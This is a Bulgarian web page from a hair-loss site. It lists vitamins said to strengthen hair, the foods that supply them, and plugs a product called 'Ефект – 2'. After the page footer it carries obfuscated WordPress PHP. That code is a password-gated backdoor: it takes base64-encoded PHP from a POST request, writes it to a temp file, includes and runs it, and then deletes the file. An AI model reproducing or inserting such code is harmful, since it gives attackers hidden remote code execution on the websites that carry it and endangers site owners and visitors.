Витамините, които ще направят косата Ви здрава и красива! | Косопад

Витамините, които ще направят косата Ви здрава и красива!

Витамините са ключът към здравата коса

Витамините са ключът към здравата коса

Всеки от нас иска да има красива и здрава коса,която не пада, но за да го постигне трябва трябва да я подхранва както външно, така и вътрешно. Липсата на група витамини в много случаи е причина за отъняването на косъма, загубата на блясък и косопад. Ето затова трябва да знаете от кои витамини не бива да лишавате тялото си, ако искате да се радвате на здрава и красива коса. Тайната на здравата, лъскава и красива коса се състои във витамин Е, витамин А, витамин РР ( ниацин), витамин В и не на последно място витамин С. Ако вашата коса е изтънена, накъсана и без блясък, то в такъв случай най-вероятно организмът Ви има липса на витамин Е.

Здравата коса изисква грижи

Здравата коса изисква грижи

Този витамин Вие може да си набавите като консумирате повече броколи, зелени листни зеленчуци, ядки и особено тиквените семки. Витамин А пък е важен не само за здравето на кожата Ви, но и това на косата Ви , защото той я заздравява още от корените и стимулира растежа й, а освен това предотвратява появата на косопад. Ниацинът подпомага косата да расте по -бързо, намалява косопада и забавя във времето появата на бели коси. По тези причини е добре да хапвате п тиквички, моркови, лук, цвекло, патладжан и др. В повечето случаи косопадът е породен от липсата на витамини от групата В в организма и за да не се налага да се борите с падащата коса е добре да похапвате повечко зеле, орехи, картофи, боб и пр. В случай, че вече сте сблъскали с коварният проблем косопада много добри отзиви на пазара има за изцяло природният продукт от ново поколение „Ефект – 2“, който може да сложи край на шепите косми, които остават в ръцете Ви, докато се сресвате. Отговорен за здравината на косъма и липсата на цъфтеж пък е витамин С затова е добре да хапвате повече цитрусови плодове, ябълки и чушки.

25. март 2014 12:20:43 от Косопад
Категории: Любопитно за косопада | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}